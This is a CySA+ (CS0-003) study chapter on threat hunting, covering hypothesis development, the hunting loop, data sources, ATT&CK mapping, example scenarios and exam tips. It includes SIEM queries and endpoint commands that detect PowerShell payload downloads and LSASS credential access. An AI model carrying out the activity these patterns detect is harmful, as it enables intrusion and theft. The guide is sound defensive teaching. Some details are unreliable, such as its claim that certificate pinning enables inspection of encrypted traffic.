This chapter covers threat hunting techniques and hypothesis development, a critical skill for the CS0-003 exam's Security Operations domain (Objective 1.1). Approximately 15-20% of exam questions relate to proactive threat detection, including hunting methodologies, data sources, and analysis techniques. Mastering these concepts will enable you to identify advanced persistent threats (APTs) and insider threats that evade automated detection tools, and to design effective hunting programs in your organization.
Jump to a section
Think of threat hunting as a detective re-opening a cold case. The security operations center (SOC) is like a police precinct that relies on emergency calls (alerts) to respond to crimes. But a proactive detective doesn't wait for calls; they review old case files, witness statements (logs), and forensic evidence (artifacts) to find patterns that were missed. They form a hypothesis: 'I suspect the burglar entered through the roof, not the door.' Then they collect evidence: check roof access logs, interview neighbors (network traffic), and look for tools (malware signatures). Each piece of evidence either supports or refutes the hypothesis. If supported, they escalate to an active investigation. If refuted, they form a new hypothesis. The detective uses known crime patterns (tactics, techniques, and procedures — TTPs) to guide their search, just as a hunter uses threat intelligence and the MITRE ATT&CK framework. The key difference from incident response is that hunting is proactive, not reactive. The detective doesn't wait for a 911 call; they actively seek out hidden threats. This analogy captures the iterative, hypothesis-driven, and evidence-based nature of threat hunting.
What is Threat Hunting?
Threat hunting is a proactive cybersecurity practice where analysts systematically search for signs of compromise that have evaded existing security controls, such as firewalls, antivirus, and SIEM rules. Unlike incident response, which reacts to alerts, hunting assumes a breach has already occurred and seeks to find it before it causes damage. The goal is to reduce the dwell time — the period between initial compromise and discovery — which averages over 200 days according to Mandiant.
The Hunting Maturity Model (HMM)
The HMM, developed by Sqrrl (now part of Palo Alto Networks), categorizes organizations into five levels: - Level 0: Initial — Relies solely on automated alerts; no active hunting. - Level 1: Minimal — Hunts based on threat intelligence feeds (e.g., known IoCs). - Level 2: Procedural — Follows standardized hunting procedures but lacks automation. - Level 3: Innovative — Creates custom hypotheses based on analytics and threat research. - Level 4: Leading — Automates hunting at scale using machine learning and big data analytics.
The CS0-003 exam expects you to understand that as maturity increases, hunting becomes more hypothesis-driven and less reliant on known indicators.
Hypothesis Development
A hypothesis is an educated guess about a potential threat activity. It drives the hunting process. Hypotheses typically come from three sources: 1. Threat Intelligence — e.g., "A new APT group is using PowerShell Empire; we might be infected." 2. Analytical Intuition — e.g., "Our DNS logs show unusual queries for non-existent domains; maybe there's C2 traffic." 3. Situational Awareness — e.g., "We just patched a critical VPN vulnerability; attackers may have exploited it before the patch."
The hypothesis must be testable, specific, and falsifiable. For example, "There is malware in our environment" is too vague. Better: "A user on the finance subnet has a process making outbound connections to a known malicious IP on port 443 every 30 minutes."
The Hunting Loop
Threat hunting follows an iterative cycle: 1. Form Hypothesis — Based on intelligence, analytics, or intuition. 2. Gather Data — Collect logs, network flows, endpoint telemetry, etc. 3. Analyze — Use tools like SIEM queries, packet captures, and EDR search. 4. Investigate — If evidence supports hypothesis, escalate to incident response. 5. Document — Record findings, even if false positive, to improve future hunts. 6. Refine — Adjust hypothesis and repeat.
Data Sources for Hunting
The exam tests knowledge of which data sources are most useful for hunting: - Network Logs — Firewall, proxy, DNS, NetFlow. DNS logs are especially valuable for detecting C2 via DGA domains. - Endpoint Logs — Windows Event Logs (Security, Sysmon), Linux auditd, macOS unified logs. Process creation events (Event ID 4688) are critical. - Application Logs — Web server logs, database audit logs. - Threat Intelligence Feeds — STIX/TAXII feeds, open-source intelligence (OSINT). - Full Packet Capture — PCAP files for deep inspection.
Hunting Techniques
#### 1. Search-Based Hunting
Uses structured queries against log repositories. Common query languages:
- Splunk SPL: index=windows EventCode=4688 NewProcessName=*powershell* | stats count by User
- ELK DSL: {"query": {"bool": {"must": [{"match": {"event.code": "4688"}}, {"wildcard": {"process.name": "*powershell*"}}]}}}
- KQL (Azure Sentinel): SecurityEvent | where EventID == 4688 | where ProcessName contains "powershell"
#### 2. Hypothesis-Based Hunting Uses the scientific method. For example, hypothesis: "An attacker is using scheduled tasks for persistence." Then query for new scheduled tasks created outside business hours, especially those running from user temp directories.
#### 3. Intelligence-Driven Hunting Leverages indicators from threat reports. If a report mentions a specific registry run key value, hunt for that exact value across endpoints.
#### 4. Analytics-Driven Hunting Uses statistical anomalies. For example, baseline normal user logon times and hunt for logons at 3 AM. Tools like User and Entity Behavior Analytics (UEBA) automate this.
The Role of MITRE ATT&CK
MITRE ATT&CK provides a common taxonomy of adversary behaviors. Hunters map hypotheses to ATT&CK techniques. For example, if you suspect credential dumping, you would focus on technique T1003 and look for access to LSASS memory (e.g., using Sysmon Event ID 10 for process access). The exam expects you to know that hunting is more effective when aligned with ATT&CK because it provides a structured way to cover all phases of an attack.
Indicators of Compromise (IoCs) vs. Indicators of Attack (IoAs)
IoCs are forensic artifacts like file hashes, IP addresses, domain names. They are reactive and easy to evade.
IoAs are behavioral patterns that indicate an attack in progress, such as unusual lateral movement or privilege escalation. Hunting focuses on IoAs because they are harder for attackers to change.
Tools and Platforms
Endpoint Detection and Response (EDR) — CrowdStrike, SentinelOne, Microsoft Defender for Endpoint. Provide real-time telemetry and search capabilities.
Security Information and Event Management (SIEM) — Splunk, ELK, Azure Sentinel. Centralize logs and enable historical searches.
Threat Intelligence Platforms (TIP) — MISP, ThreatConnect. Aggregate and correlate threat data.
Network Traffic Analysis (NTA) — Zeek, Suricata. Capture and analyze network flows.
Key Metrics
Dwell Time — Days from compromise to discovery. Hunting aims to reduce this.
Mean Time to Detect (MTTD) — Time from compromise to detection.
Mean Time to Respond (MTTR) — Time from detection to containment.
Hunting Cadence — How often hunts are performed (daily, weekly). The exam may ask about optimal cadence; it depends on risk appetite and resources.
Common Pitfalls
Assuming Alerts Are Sufficient — Automated detection misses novel attacks. Hunting fills the gap.
Over-Reliance on IoCs — Attackers change IoCs quickly. Focus on TTPs.
Poor Data Quality — Incomplete logs render hunting ineffective. Ensure logging is enabled and retained appropriately.
Lack of a Formal Process — Ad-hoc hunting produces inconsistent results. Follow a structured methodology like the Hunting Loop.
Verification Commands
On Windows endpoints, use Sysinternals tools:
- handle.exe -a -p lsass.exe — Check for handles to LSASS (potential credential dumping).
- tcpview.exe — View active TCP connections.
- autoruns.exe — Review startup programs.
On Linux:
- lsof -i — List open network connections.
- ps aux --forest — View process tree.
- auditctl -l — List audit rules.
In Splunk:
index=windows EventCode=4688 NewProcessName=*cmd.exe* | table _time, User, CommandLineInteraction with Incident Response
Hunting and incident response are complementary. Hunting may uncover evidence of a breach, which then triggers formal incident response. The hunter should preserve evidence and hand off to the response team. The exam tests the distinction: hunting is proactive, response is reactive.
Conclusion
Threat hunting is an advanced practice that requires a hypothesis-driven mindset, deep knowledge of attacker TTPs, and proficiency with security tools. By systematically searching for hidden threats, organizations can significantly reduce dwell time and improve their overall security posture. The CS0-003 exam will test your ability to apply these concepts in scenario-based questions.
Formulate a Hypothesis
Begin with a testable statement about potential malicious activity. For example, 'An attacker may have used PowerShell to download a payload from a remote server.' This hypothesis is based on a known TTP (T1059.001). The hypothesis should be specific enough to guide data collection and analysis. Avoid vague hypotheses like 'something bad might be happening.' Use threat intelligence, recent incidents, or anomalies as triggers. Document the hypothesis in a hunting plan.
Identify Data Sources
Determine which logs and telemetry can confirm or refute the hypothesis. For PowerShell downloads, relevant sources include Windows Event Logs (Event ID 4103 for PowerShell pipeline execution), network proxy logs (URLs visited), and EDR process creation events (Event ID 4688 with command-line arguments). Ensure data is available and of sufficient quality. If logs are missing, consider enabling additional logging (e.g., PowerShell script block logging).
Collect and Analyze Data
Execute queries against the selected data sources. For example, search for PowerShell processes with URLs in the command line. In Splunk: `index=windows EventCode=4688 NewProcessName=*powershell* CommandLine=*http*`. Analyze the results for anomalies: unexpected source IPs, unusual times, or connections to known bad domains. Use statistical baselines to flag outliers. If the data volume is large, use aggregation and filtering.
Investigate Findings
For each potential hit, perform a deeper investigation. Check the parent process, user account, and network connections. Use timeline analysis to correlate events. For example, if a user ran PowerShell that connected to a suspicious IP, check if that IP is associated with known malware. If the evidence strongly supports the hypothesis, escalate to incident response. If inconclusive, refine the hypothesis and continue hunting.
Document and Refine
Record all findings, including false positives. Document the hypothesis, data sources, queries used, and outcomes. This documentation improves future hunts and helps build a knowledge base. If the hypothesis was confirmed, update threat intelligence and detection rules. If refuted, consider alternative hypotheses. The hunting loop then repeats, continuously improving the organization's detection capabilities.
Scenario 1: Detecting Cobalt Strike Beaconing
A large financial institution uses Splunk as its SIEM and CrowdStrike Falcon as EDR. The threat hunting team hypothesizes that an attacker may have deployed Cobalt Strike beacons, which exhibit periodic HTTPS beaconing with jitter. They create a Splunk query to find outbound connections from endpoints to external IPs on port 443 with a regular pattern of 60-second intervals plus random jitter. They use stats to calculate the standard deviation of connection times. They find one server with connections every 60-70 seconds to an IP in a cloud provider. The EDR shows that the process is svchost.exe running from a non-standard path. Investigation reveals a malicious DLL loaded via DLL side-loading. The incident response team is notified, and the beacon is removed. Dwell time was 45 days.
Scenario 2: Insider Threat Data Exfiltration
A healthcare organization suspects an employee may be exfiltrating patient data via email. The hunting team hypothesizes that a user is sending unusually large volumes of email with attachments to external addresses. They query the email gateway logs for users with >50 emails per day and attachment sizes >10 MB. They find one user in accounting sending 200 emails daily to a personal Gmail address. The attachments are PDFs of patient records. The hunt leads to a formal investigation, and the employee is terminated. The key was baselining normal email behavior; the anomaly stood out clearly.
Scenario 3: Living-off-the-Land (LotL) Attack
A tech company uses Microsoft Defender for Endpoint. The hunt team hypothesizes that an attacker is using legitimate administrative tools (wmic, mshta, regsvr32) for malicious purposes. They create a custom detection rule in Defender for Endpoint that triggers when wmic is used to create a process on a remote machine (lateral movement). Within a week, the rule fires on a workstation where wmic was used to launch cmd.exe on a server. The user account was compromised via phishing. The attack was stopped before data exfiltration. This demonstrates the importance of hunting for TTPs rather than IoCs.
Common Misconfigurations
Insufficient Logging — Many organizations do not enable PowerShell script block logging or command-line auditing, making it impossible to detect LotL attacks.
Short Log Retention — Logs kept for only 30 days may miss long-dwell threats.
Siloed Data — Network and endpoint logs in separate systems hinder correlation.
Performance Considerations
Hunting queries can be resource-intensive. Schedule heavy queries during off-peak hours. Use indexed fields to speed up searches. In Splunk, limit the time range and use tstats for faster aggregations over summary data. In EDR, use pre-built queries and avoid broad wildcards.
What CS0-003 Tests
Objective 1.1 (Security Operations) includes threat hunting techniques and hypothesis development. The exam expects you to:
Differentiate between proactive hunting and reactive incident response.
Understand the Hunting Maturity Model (HMM) levels.
Know the steps of the hunting loop.
Identify appropriate data sources for specific hypotheses.
Recognize the difference between IoCs and IoAs.
Apply the MITRE ATT&CK framework to structure hunts.
Common Wrong Answers
"Threat hunting is the same as vulnerability scanning." — Wrong. Vulnerability scanning identifies known weaknesses; hunting looks for active compromise.
"Hunting should only be done after an alert." — Wrong. Hunting is proactive, not reactive.
"The best data source for hunting is antivirus logs." — Wrong. Antivirus logs are limited; network and endpoint logs are more valuable.
"A hypothesis is not needed; you can just search for all malicious activity." — Wrong. Without a hypothesis, the search is unfocused and inefficient.
Specific Numbers and Terms
Dwell time — average >200 days; hunting aims to reduce it.
HMM levels — 0 to 4; be able to identify characteristics of each.
MITRE ATT&CK — over 200 techniques; know common ones like T1059 (Command and Scripting Interpreter), T1003 (Credential Dumping), T1041 (Exfiltration Over C2 Channel).
Sysmon Event IDs — 1 (process creation), 3 (network connection), 10 (process access), 11 (file creation), 12 (registry modification).
Windows Event IDs — 4688 (process creation), 4103 (PowerShell pipeline execution), 5156 (Windows Filtering Platform connection).
Edge Cases
False positives — Hunting often yields many false positives. The exam may ask how to reduce them: use baselines, whitelists, and context.
Encrypted traffic — Hunting for malicious content in encrypted traffic requires SSL/TLS inspection or certificate pinning.
Cloud environments — Hunting in AWS/Azure requires different data sources (CloudTrail, VPC Flow Logs, Azure Activity Log).
How to Eliminate Wrong Answers
If an answer suggests waiting for an alert, it's wrong — hunting is proactive.
If an answer focuses on patching or configuration, it's likely vulnerability management, not hunting.
If an answer mentions only IoCs, it's less effective than TTP-based hunting.
The correct answer often involves a specific hypothesis and data source.
Threat hunting is proactive; incident response is reactive.
The Hunting Maturity Model has five levels (0-4); Level 4 is fully automated.
A hypothesis must be specific, testable, and falsifiable.
MITRE ATT&CK provides a structured taxonomy for hunting hypotheses.
Key data sources: Windows Event Logs, Sysmon, DNS logs, EDR telemetry.
IoAs (indicators of attack) are behavioral; IoCs are forensic artifacts.
The hunting loop: Form hypothesis → Gather data → Analyze → Investigate → Document → Refine.
Common hunting techniques: search-based, hypothesis-based, intelligence-driven, analytics-driven.
Dwell time reduction is a primary goal of hunting.
Document all findings, including false positives, to improve future hunts.
These come up on the exam all the time. Here's how to tell them apart.
Hypothesis-Driven Hunting
Begins with a testable hypothesis about adversary behavior.
Focuses on TTPs and behavioral patterns.
More effective against advanced persistent threats.
Requires deep understanding of attacker methodologies.
Produces longer-lasting detection value.
IoC-Driven Hunting
Searches for known indicators like file hashes or IPs.
Reactive and easily evaded by changing IoCs.
Suitable for commodity malware.
Can be automated with threat intelligence feeds.
Indicators become obsolete quickly.
Mistake
Threat hunting is the same as incident response.
Correct
Incident response is reactive — it begins after a confirmed incident. Threat hunting is proactive — it seeks potential incidents before they are detected by automated tools. They are complementary but distinct processes.
Mistake
You need expensive commercial tools to hunt effectively.
Correct
While tools like EDR and SIEM help, effective hunting can be done with free tools like Sysmon, Zeek, and ELK. The key is having quality data and a structured process, not the tool cost.
Mistake
Hunting always starts with a known indicator of compromise.
Correct
Advanced hunting starts with a hypothesis about attacker behavior (TTPs), not specific IoCs. IoC-based hunting is reactive and easily evaded. Hypothesis-driven hunting is more robust.
Mistake
If no alerts are triggered, there is no threat.
Correct
Automated alerts only catch known patterns. Sophisticated attackers can evade detection. Hunting assumes a breach may exist and actively searches for subtle signs that alerts miss.
Mistake
Hunting should be performed only by senior analysts.
Correct
While senior analysts bring valuable experience, junior analysts can also contribute by following structured hunting procedures and using playbooks. The key is training and a mature process.
Reveal each answer, then mark whether you got it right. Score 60%+ to unlock the next chapter.
Threat hunting is proactive — you search for threats that may have evaded detection, without waiting for an alert. Incident response is reactive — you respond after a confirmed incident. Hunting reduces dwell time, while response contains and eradicates the threat. Both are part of a mature security operations program.
The typical hunting loop includes: (1) Form a hypothesis based on intelligence, analytics, or intuition. (2) Identify and collect relevant data sources. (3) Analyze the data using queries and tools. (4) Investigate any findings that support the hypothesis. (5) Document results and refine the hypothesis. This cycle repeats continuously.
Critical data sources include Windows Event Logs (especially Security and Sysmon), DNS logs, network flow data (NetFlow/IPFIX), proxy logs, EDR telemetry (process creation, network connections, file events), and full packet capture. The best source depends on the hypothesis. For example, hunting for lateral movement often uses Windows Event ID 4624 (logon) and 4688 (process creation).
MITRE ATT&CK provides a comprehensive matrix of adversary tactics and techniques. Hunters can use it to structure hypotheses by technique (e.g., T1059 for command scripting). It ensures coverage across the attack lifecycle and helps prioritize hunts based on threat intelligence. The exam expects you to map hunting activities to ATT&CK techniques.
The HMM, developed by Sqrrl, defines five levels of hunting capability: Level 0 (Initial) — relies on automated alerts; Level 1 (Minimal) — uses threat intelligence feeds; Level 2 (Procedural) — follows standardized procedures; Level 3 (Innovative) — creates custom hypotheses; Level 4 (Leading) — automates hunting at scale. The exam may ask you to identify an organization's maturity level based on a description.
IoAs (Indicators of Attack) are behavioral patterns that suggest an attack is in progress, such as unusual lateral movement or privilege escalation. IoCs (Indicators of Compromise) are forensic artifacts like file hashes or IP addresses. IoAs are more valuable for hunting because they are harder for attackers to change and provide earlier detection.
Yes, at higher maturity levels (HMM Level 4), hunting can be automated using machine learning and big data analytics to continuously search for anomalies. However, human intuition and creativity remain important for forming hypotheses. Automation handles repetitive searches, while analysts focus on complex investigations.
You've just covered Threat Hunting Techniques and Hypothesis Development — now see how well it sticks with free CS0-003 practice questions. Full explanations included, no account needed.
Done with this chapter?